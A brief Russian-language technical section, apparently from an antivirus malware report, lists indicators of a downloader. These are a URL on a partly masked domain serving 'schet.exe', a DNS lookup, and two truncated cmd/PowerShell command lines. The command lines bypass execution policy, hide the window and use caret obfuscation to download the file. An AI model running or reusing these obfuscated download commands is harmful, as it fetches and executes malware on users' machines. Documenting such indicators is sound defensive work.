Техническая информация
- http://mi#####edskrishna.info/wp-content/plugins/libravatar-replace/schet.exe как %appdata%.exe
- DNS ASK mi#####edskrishna.info
- '<SYSTEM32>\cmd.exe' /c pow^ershell.exe -ExecutionPolicy bypass -nopro^file -window^style hi^dden (New-Object System.Net.WebClient^).Dow^nloadFile('http://mi#####edskrishna.info/wp-content/plugins/libravatar-replac...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c pow^ershell.exe -ExecutionPolicy bypass -nopro^file -window^style hi^dden (New-Object System.Net.WebClient^).Dow^nloadFile('http://mi#####edskrishna.info/wp-content/plugins/libravatar-replac...